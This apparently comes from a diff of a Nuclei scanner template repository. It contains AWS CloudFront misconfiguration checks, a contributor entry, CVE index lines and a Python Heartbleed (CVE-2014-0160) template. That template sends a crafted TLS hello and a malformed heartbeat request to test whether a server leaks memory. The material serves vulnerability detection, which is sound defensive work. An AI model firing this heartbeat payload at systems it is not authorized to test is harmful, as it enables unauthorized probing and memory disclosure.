||||||
|
Not enabling CloudFront Origin Shield can lead to increased load on your origin server, higher latency, and greater costs due to more frequent requests during traffic spikes.
|
||||||
|
remediation: |
|
||||||
|
Enable CloudFront Origin Shield for your distributions to optimize cache efficiency, reduce load on your origin server, and improve content delivery performance during high traffic periods.
|
||||||
|
reference:
|
||||||
|
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/enable-origin-shield.html
|
||||||
|
- https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/origin-shield.html
|
||||||
|
tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config
|
||||||
|
|
||||||
|
variables:
|
||||||
|
region: "us-west-2"
|
||||||
|
|
||||||
|
flow: |
|
||||||
|
code(1)
|
||||||
|
for(let DistributionListItemsId of iterate(template.distributions)){
|
||||||
|
set("distribution", DistributionListItemsId)
|
||||||
|
code(2)
|
||||||
|
}
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
|
|
||||||
|
code:
|
||||||
|
- engine:
|
||||||
|
- sh
|
||||||
|
- bash
|
||||||
|
|
||||||
|
source: |
|
||||||
|
aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: json
|
||||||
|
name: distributions
|
||||||
|
internal: true
|
||||||
|
json:
|
||||||
|
- '.[]'
|
||||||
|
|
||||||
|
- engine:
|
||||||
|
- sh
|
||||||
|
- bash
|
||||||
|
|
||||||
|
source: |
|
||||||
|
aws cloudfront get-distribution-config --id $distribution --query 'DistributionConfig.Origins.Items[*].OriginShield.Enabled' --region $region --output text
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "False"
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- '"CloudFront Origin Shield " + distribution + " not Enabled"'
|
||||||
|
# digest: 4a0a00473045022032e6b219a62c0fa94878575c07b5a4e05b088c8784f3ffdd724353a64d73e165022100f8a3cd82c152bd084c703fe67574a40a91c12ba1372d1cd9c4c0e4584b72a4be:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,65 @@
|
||||||
|
id: cloudfront-security-policy
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: CloudFront Security Policy
|
||||||
|
author: DhiyaneshDK
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
Ensure that your Amazon CloudFront distributions are using a security policy with minimum TLSv1.2 or TLSv1.3 and appropriate security ciphers for HTTPS viewer connections.
|
||||||
|
impact: |
|
||||||
|
Failing to use a security policy with a minimum of TLSv1.2 or TLSv1.3 and appropriate ciphers for HTTPS viewer connections in CloudFront can expose sensitive data to interception and reduce the overall security of your application.
|
||||||
|
remediation: |
|
||||||
|
Configure your Amazon CloudFront distributions to use a security policy that enforces a minimum of TLSv1.2 or TLSv1.3 and specifies secure ciphers for HTTPS viewer connections.
|
||||||
|
reference:
|
||||||
|
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/security-policy.html
|
||||||
|
- https://aws.amazon.com/about-aws/whats-new/2017/09/amazon-cloudfront-now-lets-you-select-a-security-policy-with-minimum-tls-v1_1-1_2-and-security-ciphers-for-viewer-connections/
|
||||||
|
tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config
|
||||||
|
|
||||||
|
variables:
|
||||||
|
region: "us-west-2"
|
||||||
|
|
||||||
|
flow: |
|
||||||
|
code(1)
|
||||||
|
for(let DistributionListItemsId of iterate(template.distributions)){
|
||||||
|
set("distribution", DistributionListItemsId)
|
||||||
|
code(2)
|
||||||
|
}
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
|
|
||||||
|
code:
|
||||||
|
- engine:
|
||||||
|
- sh
|
||||||
|
- bash
|
||||||
|
|
||||||
|
source: |
|
||||||
|
aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: json
|
||||||
|
name: distributions
|
||||||
|
internal: true
|
||||||
|
json:
|
||||||
|
- '.[]'
|
||||||
|
|
||||||
|
- engine:
|
||||||
|
- sh
|
||||||
|
- bash
|
||||||
|
|
||||||
|
source: |
|
||||||
|
aws cloudfront get-distribution --id $distribution --query 'Distribution.DistributionConfig.ViewerCertificate.MinimumProtocolVersion' --region $region --output json
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '"TLSv1"'
|
||||||
|
- '"TLSv1_2016"'
|
||||||
|
- '"TLSv1.1_2016"'
|
||||||
|
- '"TLSv1.2_2018"'
|
||||||
|
- '"TLSv1.2_2019"'
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- '"CloudFront Uses Insecure Protocols " + distribution'
|
||||||
|
# digest: 490a00463044022019cb76f463fd374301b04d91953274d0df2e3c81f325c2ca914ec8cd7292228a02206d121f3f2cb668cf74b765e168580e8d34c7367d81c680a9cea321b457a9f37e:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,61 @@
|
||||||
|
id: cloudfront-traffic-unencrypted
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: CloudFront Traffic To Origin Unencrypted
|
||||||
|
author: DhiyaneshDK
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
Ensure that the communication between your Amazon CloudFront distributions and their custom origins is encrypted using HTTPS in order to secure the delivery of your web content and fulfill compliance requirements for encryption in transit.
|
||||||
|
impact: |
|
||||||
|
Unencrypted traffic between CloudFront and custom origins can expose sensitive data during transmission, leading to potential data breaches and non-compliance with encryption standards.
|
||||||
|
remediation: |
|
||||||
|
Ensure that all communications between your Amazon CloudFront distributions and custom origins are encrypted by configuring them to use HTTPS, thereby securing the delivery of web content and meeting compliance requirements for encryption in transit.
|
||||||
|
reference:
|
||||||
|
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/cloudfront-traffic-to-origin-unencrypted.html
|
||||||
|
- http://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/SecureConnections.html
|
||||||
|
tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config
|
||||||
|
|
||||||
|
variables:
|
||||||
|
region: "us-west-2"
|
||||||
|
|
||||||
|
flow: |
|
||||||
|
code(1)
|
||||||
|
for(let DistributionListItemsId of iterate(template.distributions)){
|
||||||
|
set("distribution", DistributionListItemsId)
|
||||||
|
code(2)
|
||||||
|
}
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
|
|
||||||
|
code:
|
||||||
|
- engine:
|
||||||
|
- sh
|
||||||
|
- bash
|
||||||
|
|
||||||
|
source: |
|
||||||
|
aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: json
|
||||||
|
name: distributions
|
||||||
|
internal: true
|
||||||
|
json:
|
||||||
|
- '.[]'
|
||||||
|
|
||||||
|
- engine:
|
||||||
|
- sh
|
||||||
|
- bash
|
||||||
|
|
||||||
|
source: |
|
||||||
|
aws cloudfront get-distribution --id $distribution --query 'Distribution.DistributionConfig.Origins.Items[*].CustomOriginConfig.OriginProtocolPolicy' --region $region --output json
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '"http-only"'
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- '"CloudFront " + distribution + " uses HTTP Only"'
|
||||||
|
# digest: 4a0a004730450220510c7757a3c8d77dcafbd819fb087db60a3243f239bdbd580f241f16f493279002210099bb7f3694be216d0aac7e02bc4c8926ba258745185e6213f44a8695460a7cd2:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,61 @@
|
||||||
|
id: cloudfront-viewer-policy
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: CloudFront Viewer Protocol Policy
|
||||||
|
author: DhiyaneshDK
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
Ensure that the communication between your Amazon CloudFront distribution and its viewers is encrypted using HTTPS in order to secure the delivery of your web content.
|
||||||
|
impact: |
|
||||||
|
Failing to enforce HTTPS for viewer connections in CloudFront can expose web content to interception and manipulation, compromising the security and integrity of sensitive data transmitted between users and the distribution
|
||||||
|
remediation: |
|
||||||
|
Configure your Amazon CloudFront distribution's viewer protocol policy to either redirect HTTP requests to HTTPS or require HTTPS connections exclusively, ensuring secure delivery of web content and protecting against potential data breaches.
|
||||||
|
reference:
|
||||||
|
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/viewer-protocol-policy.html
|
||||||
|
- https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/distribution-web-values-specify.html
|
||||||
|
tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config
|
||||||
|
|
||||||
|
variables:
|
||||||
|
region: "us-west-2"
|
||||||
|
|
||||||
|
flow: |
|
||||||
|
code(1)
|
||||||
|
for(let DistributionListItemsId of iterate(template.distributions)){
|
||||||
|
set("distribution", DistributionListItemsId)
|
||||||
|
code(2)
|
||||||
|
}
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
|
|
||||||
|
code:
|
||||||
|
- engine:
|
||||||
|
- sh
|
||||||
|
- bash
|
||||||
|
|
||||||
|
source: |
|
||||||
|
aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: json
|
||||||
|
name: distributions
|
||||||
|
internal: true
|
||||||
|
json:
|
||||||
|
- '.[]'
|
||||||
|
|
||||||
|
- engine:
|
||||||
|
- sh
|
||||||
|
- bash
|
||||||
|
|
||||||
|
source: |
|
||||||
|
aws cloudfront get-distribution-config --id $distribution --query 'DistributionConfig.CacheBehaviors.Items[*].ViewerProtocolPolicy' --output json --region $region
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '"allow-all"'
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- '"CloudFront Viewer Policy " + distribution + " allows all"'
|
||||||
|
# digest: 4b0a00483046022100d710e5ab5c7940783bf341bf221f46d1cfe6638e4d33b69cc03a589e3cb0705302210084f5e59cda9f7b0e3fff5500b00eb922fae079e988ce96a49a04de2dc15f9cfc:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,139 @@
|
||||||
|
id: CVE-2014-0160
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: OpenSSL Heartbleed Vulnerability
|
||||||
|
author: pussycat0x
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users, and the actual content. This allows attackers to eavesdrop on communications, steal data directly from the services and users, and impersonate services and users.
|
||||||
|
reference:
|
||||||
|
- https://github.com/vulhub/vulhub/tree/master/openssl/CVE-2014-0160
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2014,openssl,heartbleed,code
|
||||||
|
|
||||||
|
variables:
|
||||||
|
url: "{{RootURL}}"
|
||||||
|
|
||||||
|
code:
|
||||||
|
- engine:
|
||||||
|
- py
|
||||||
|
- python3
|
||||||
|
source: |
|
||||||
|
import os
|
||||||
|
import struct
|
||||||
|
import socket
|
||||||
|
import time
|
||||||
|
import select
|
||||||
|
from urllib.parse import urlparse
|
||||||
|
|
||||||
|
def h2bin(x):
|
||||||
|
return bytes.fromhex(x.replace(' ', '').replace('\n', ''))
|
||||||
|
|
||||||
|
hello = h2bin('''
|
||||||
|
16 03 02 00 dc 01 00 00 d8 03 02 53
|
||||||
|
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
|
||||||
|
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
|
||||||
|
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
|
||||||
|
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
|
||||||
|
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
|
||||||
|
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
|
||||||
|
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
|
||||||
|
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
|
||||||
|
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
|
||||||
|
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
|
||||||
|
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
|
||||||
|
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
|
||||||
|
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
|
||||||
|
00 0f 00 01 01
|
||||||
|
''')
|
||||||
|
|
||||||
|
hb = h2bin('''
|
||||||
|
18 03 02 00 03
|
||||||
|
01 40 00
|
||||||
|
''')
|
||||||
|
|
||||||
|
def recvall(s, length, timeout=5):
|
||||||
|
endtime = time.time() + timeout
|
||||||
|
rdata = b''
|
||||||
|
remain = length
|
||||||
|
while remain > 0:
|
||||||
|
rtime = endtime - time.time()
|
||||||
|
if rtime < 0:
|
||||||
|
return None
|
||||||
|
r, _, _ = select.select([s], [], [], 5)
|
||||||
|
if s in r:
|
||||||
|
data = s.recv(remain)
|
||||||
|
if not data:
|
||||||
|
return None
|
||||||
|
rdata += data
|
||||||
|
remain -= len(data)
|
||||||
|
return rdata
|
||||||
|
|
||||||
|
def recvmsg(s):
|
||||||
|
hdr = recvall(s, 5)
|
||||||
|
if hdr is None:
|
||||||
|
return None, None, None
|
||||||
|
typ, ver, ln = struct.unpack('>BHH', hdr)
|
||||||
|
pay = recvall(s, ln, 10)
|
||||||
|
if pay is None:
|
||||||
|
return None, None, None
|
||||||
|
return typ, ver, pay
|
||||||
|
|
||||||
|
def hit_hb(s):
|
||||||
|
s.send(hb)
|
||||||
|
while True:
|
||||||
|
typ, ver, pay = recvmsg(s)
|
||||||
|
if typ is None:
|
||||||
|
return False
|
||||||
|
if typ == 24: # Heartbeat response
|
||||||
|
if len(pay) > 3:
|
||||||
|
print('server is vulnerable')
|
||||||
|
return True
|
||||||
|
return False
|
||||||
|
if typ == 21: # Server alert
|
||||||
|
return False
|
||||||
|
|
||||||
|
def main():
|
||||||
|
# Get the URL from the environment variable
|
||||||
|
url = os.getenv('url')
|
||||||
|
if not url:
|
||||||
|
print("URL environment variable is not set.")
|
||||||
|
return
|
||||||
|
|
||||||
|
# Parse the URL
|
||||||
|
parsed_url = urlparse(url)
|
||||||
|
host = parsed_url.hostname
|
||||||
|
port = parsed_url.port if parsed_url.port else 443
|
||||||
|
|
||||||
|
if not host:
|
||||||
|
return
|
||||||
|
|
||||||
|
# Create a socket connection
|
||||||
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||||
|
s.connect((host, port))
|
||||||
|
|
||||||
|
# Send Client Hello
|
||||||
|
s.send(hello)
|
||||||
|
|
||||||
|
# Wait for Server Hello
|
||||||
|
while True:
|
||||||
|
typ, ver, pay = recvmsg(s)
|
||||||
|
if typ is None:
|
||||||
|
return
|
||||||
|
if typ == 22 and pay[0] == 0x0E: # Server hello done
|
||||||
|
break
|
||||||
|
|
||||||
|
# Send Heartbeat request and check vulnerability
|
||||||
|
s.send(hb)
|
||||||
|
hit_hb(s)
|
||||||
|
|
||||||
|
if __name__ == '__main__':
|
||||||
|
main()
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- "contains(response,'server is vulnerable')"
|
||||||
|
|
||||||
|
# digest: 4a0a004730450221009dd56203fe8a75e8d69026162da7c8d74639d3b0002df5712f0e5d96d6be9e890220475807dc2322d0c2eeab4648a8424cdac2a8b67794c062aec537096e033c7c5a:922c64590222798bb761d5b6d8e72950
|
|
@ -1469,5 +1469,15 @@
|
||||||
"email": ""
|
"email": ""
|
||||||
|
|
||||||
}
|
}
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"author": "jpg0mez",
|
||||||
|
"links": {
|
||||||
|
"github": "https://github.com/JPG0mez",
|
||||||
|
"twitter": "https://twitter.com/jpgp__",
|
||||||
|
"linkedin": "https://www.linkedin.com/in/juan-pablo-gomez-postigo-173a0b163/",
|
||||||
|
"website": "",
|
||||||
|
"email": ""
|
||||||
|
}
|
||||||
}
|
}
|
||||||
]
|
]
|
||||||
|
|
|
@ -377,6 +377,7 @@
|
||||||
{"ID":"CVE-2016-7834","Info":{"Name":"Sony IPELA Engine IP Camera - Hardcoded Account","Severity":"high","Description":"Multiple SONY network cameras are vulnerable to sensitive information disclosure via hardcoded credentials.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2016/CVE-2016-7834.yaml"}
|
{"ID":"CVE-2016-7834","Info":{"Name":"Sony IPELA Engine IP Camera - Hardcoded Account","Severity":"high","Description":"Multiple SONY network cameras are vulnerable to sensitive information disclosure via hardcoded credentials.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2016/CVE-2016-7834.yaml"}
|
||||||
{"ID":"CVE-2016-7981","Info":{"Name":"SPIP \u003c3.1.2 - Cross-Site Scripting","Severity":"medium","Description":"SPIP 3.1.2 and earlier contains a cross-site scripting vulnerability in valider_xml.php which allows remote attackers to inject arbitrary web script or HTML via the var_url parameter in a valider_xml action.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2016/CVE-2016-7981.yaml"}
|
{"ID":"CVE-2016-7981","Info":{"Name":"SPIP \u003c3.1.2 - Cross-Site Scripting","Severity":"medium","Description":"SPIP 3.1.2 and earlier contains a cross-site scripting vulnerability in valider_xml.php which allows remote attackers to inject arbitrary web script or HTML via the var_url parameter in a valider_xml action.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2016/CVE-2016-7981.yaml"}
|
||||||
{"ID":"CVE-2016-8527","Info":{"Name":"Aruba Airwave \u003c8.2.3.1 - Cross-Site Scripting","Severity":"medium","Description":"Aruba Airwave before version 8.2.3.1 is vulnerable to reflected cross-site scripting.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2016/CVE-2016-8527.yaml"}
|
{"ID":"CVE-2016-8527","Info":{"Name":"Aruba Airwave \u003c8.2.3.1 - Cross-Site Scripting","Severity":"medium","Description":"Aruba Airwave before version 8.2.3.1 is vulnerable to reflected cross-site scripting.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2016/CVE-2016-8527.yaml"}
|
||||||
|
{"ID":"CVE-2016-9299","Info":{"Name":"Jenkins CLI - HTTP Java Deserialization","Severity":"critical","Description":"The remoting module in Jenkins before 2.32 and LTS before 2.19.3 allows remote attackers to execute arbitrary code via a crafted serialized Java object, which triggers an LDAP query to a third-party server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2016/CVE-2016-9299.yaml"}
|
||||||
{"ID":"CVE-2017-0929","Info":{"Name":"DotNetNuke (DNN) ImageHandler \u003c9.2.0 - Server-Side Request Forgery","Severity":"high","Description":"DotNetNuke (aka DNN) before 9.2.0 suffers from a server-side request forgery vulnerability in the DnnImageHandler class. Attackers may be able to access information about internal network resources.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2017/CVE-2017-0929.yaml"}
|
{"ID":"CVE-2017-0929","Info":{"Name":"DotNetNuke (DNN) ImageHandler \u003c9.2.0 - Server-Side Request Forgery","Severity":"high","Description":"DotNetNuke (aka DNN) before 9.2.0 suffers from a server-side request forgery vulnerability in the DnnImageHandler class. Attackers may be able to access information about internal network resources.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2017/CVE-2017-0929.yaml"}
|
||||||
{"ID":"CVE-2017-1000028","Info":{"Name":"Oracle GlassFish Server Open Source Edition 4.1 - Local File Inclusion","Severity":"high","Description":"Oracle GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated local file inclusion vulnerabilities that can be exploited by issuing specially crafted HTTP GET requests.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2017/CVE-2017-1000028.yaml"}
|
{"ID":"CVE-2017-1000028","Info":{"Name":"Oracle GlassFish Server Open Source Edition 4.1 - Local File Inclusion","Severity":"high","Description":"Oracle GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated local file inclusion vulnerabilities that can be exploited by issuing specially crafted HTTP GET requests.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2017/CVE-2017-1000028.yaml"}
|
||||||
{"ID":"CVE-2017-1000029","Info":{"Name":"Oracle GlassFish Server Open Source Edition 3.0.1 - Local File Inclusion","Severity":"high","Description":"Oracle GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to unauthenticated local file inclusion vulnerabilities that allow remote attackers to request arbitrary files on the server.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2017/CVE-2017-1000029.yaml"}
|
{"ID":"CVE-2017-1000029","Info":{"Name":"Oracle GlassFish Server Open Source Edition 3.0.1 - Local File Inclusion","Severity":"high","Description":"Oracle GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to unauthenticated local file inclusion vulnerabilities that allow remote attackers to request arbitrary files on the server.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2017/CVE-2017-1000029.yaml"}
|
||||||
|
@ -661,6 +662,7 @@
|
||||||
{"ID":"CVE-2019-0221","Info":{"Name":"Apache Tomcat - Cross-Site Scripting","Severity":"medium","Description":"Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39, and 7.0.0 to 7.0.93 are vulnerable to cross-site scripting because the SSI printenv command echoes user provided data without escaping. Note: SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-0221.yaml"}
|
{"ID":"CVE-2019-0221","Info":{"Name":"Apache Tomcat - Cross-Site Scripting","Severity":"medium","Description":"Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39, and 7.0.0 to 7.0.93 are vulnerable to cross-site scripting because the SSI printenv command echoes user provided data without escaping. Note: SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-0221.yaml"}
|
||||||
{"ID":"CVE-2019-0230","Info":{"Name":"Apache Struts \u003c=2.5.20 - Remote Code Execution","Severity":"critical","Description":"Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation when evaluated on raw user input in tag attributes, which may lead to remote code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-0230.yaml"}
|
{"ID":"CVE-2019-0230","Info":{"Name":"Apache Struts \u003c=2.5.20 - Remote Code Execution","Severity":"critical","Description":"Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation when evaluated on raw user input in tag attributes, which may lead to remote code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-0230.yaml"}
|
||||||
{"ID":"CVE-2019-0232","Info":{"Name":"Apache Tomcat `CGIServlet` enableCmdLineArguments - Remote Code Execution","Severity":"high","Description":"When running on Windows with enableCmdLineArguments enabled, the CGI Servlet in Apache Tomcat 9.0.0.M1 to 9.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 is vulnerable to Remote Code Execution due to a bug in the way the JRE passes command line arguments to Windows. The CGI Servlet is disabled by default. The CGI option enableCmdLineArguments is disable by default in Tomcat 9.0.x (and will be disabled by default in all versions in response to this vulnerability). For a detailed explanation of the JRE behaviour, see Markus Wulftange's blog (https-//codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html) and this archived MSDN blog (https-//web.archive.org/web/20161228144344/https-//blogs.msdn.microsoft.com/twistylittlepassagesallalike/2011/04/23/everyone-quotes-command-line-arguments-the-wrong-way/).\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2019/CVE-2019-0232.yaml"}
|
{"ID":"CVE-2019-0232","Info":{"Name":"Apache Tomcat `CGIServlet` enableCmdLineArguments - Remote Code Execution","Severity":"high","Description":"When running on Windows with enableCmdLineArguments enabled, the CGI Servlet in Apache Tomcat 9.0.0.M1 to 9.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 is vulnerable to Remote Code Execution due to a bug in the way the JRE passes command line arguments to Windows. The CGI Servlet is disabled by default. The CGI option enableCmdLineArguments is disable by default in Tomcat 9.0.x (and will be disabled by default in all versions in response to this vulnerability). For a detailed explanation of the JRE behaviour, see Markus Wulftange's blog (https-//codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html) and this archived MSDN blog (https-//web.archive.org/web/20161228144344/https-//blogs.msdn.microsoft.com/twistylittlepassagesallalike/2011/04/23/everyone-quotes-command-line-arguments-the-wrong-way/).\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2019/CVE-2019-0232.yaml"}
|
||||||
|
{"ID":"CVE-2019-1003000","Info":{"Name":"Jenkins Script Security Plugin \u003c=1.49 - Sandbox Bypass","Severity":"high","Description":"A sandbox bypass vulnerability exists in the Jenkins Script Security Plugin (versions 1.49 and earlier) within src/main/java/org/jenkinsci/plugins/scriptsecurity/sandbox/groovy/GroovySandbox.java. This flaw allows attackers with permission to submit sandboxed scripts to execute arbitrary code on the Jenkins master JVM, potentially compromising the entire Jenkins environment.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2019/CVE-2019-1003000.yaml"}
|
||||||
{"ID":"CVE-2019-10068","Info":{"Name":"Kentico CMS Insecure Deserialization Remote Code Execution","Severity":"critical","Description":"Kentico CMS is susceptible to remote code execution via a .NET deserialization vulnerability.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-10068.yaml"}
|
{"ID":"CVE-2019-10068","Info":{"Name":"Kentico CMS Insecure Deserialization Remote Code Execution","Severity":"critical","Description":"Kentico CMS is susceptible to remote code execution via a .NET deserialization vulnerability.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-10068.yaml"}
|
||||||
{"ID":"CVE-2019-10092","Info":{"Name":"Apache HTTP Server \u003c=2.4.39 - HTML Injection/Partial Cross-Site Scripting","Severity":"medium","Description":"Apache HTTP Server versions 2.4.0 through 2.4.39 are vulnerable to a limited cross-site scripting issue affecting the mod_proxy error page. An attacker could cause the link on the error page to be malformed and instead point to a page of their choice. This would only be exploitable where a server was set up with proxying enabled but was misconfigured in such a way that the Proxy Error page was displayed.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-10092.yaml"}
|
{"ID":"CVE-2019-10092","Info":{"Name":"Apache HTTP Server \u003c=2.4.39 - HTML Injection/Partial Cross-Site Scripting","Severity":"medium","Description":"Apache HTTP Server versions 2.4.0 through 2.4.39 are vulnerable to a limited cross-site scripting issue affecting the mod_proxy error page. An attacker could cause the link on the error page to be malformed and instead point to a page of their choice. This would only be exploitable where a server was set up with proxying enabled but was misconfigured in such a way that the Proxy Error page was displayed.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-10092.yaml"}
|
||||||
{"ID":"CVE-2019-10098","Info":{"Name":"Apache HTTP server v2.4.0 to v2.4.39 - Open Redirect","Severity":"medium","Description":"In Apache HTTP server 2.4.0 to 2.4.39, Redirects configured with mod_rewrite that were intended to be self-referential might be fooled by encoded newlines and redirect instead to an unexpected URL within the request URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-10098.yaml"}
|
{"ID":"CVE-2019-10098","Info":{"Name":"Apache HTTP server v2.4.0 to v2.4.39 - Open Redirect","Severity":"medium","Description":"In Apache HTTP server 2.4.0 to 2.4.39, Redirects configured with mod_rewrite that were intended to be self-referential might be fooled by encoded newlines and redirect instead to an unexpected URL within the request URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-10098.yaml"}
|
||||||
|
@ -2449,7 +2451,6 @@
|
||||||
{"ID":"CVE-2023-6977","Info":{"Name":"Mlflow \u003c2.8.0 - Local File Inclusion","Severity":"high","Description":"Mlflow before 2.8.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6977.yaml"}
|
{"ID":"CVE-2023-6977","Info":{"Name":"Mlflow \u003c2.8.0 - Local File Inclusion","Severity":"high","Description":"Mlflow before 2.8.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6977.yaml"}
|
||||||
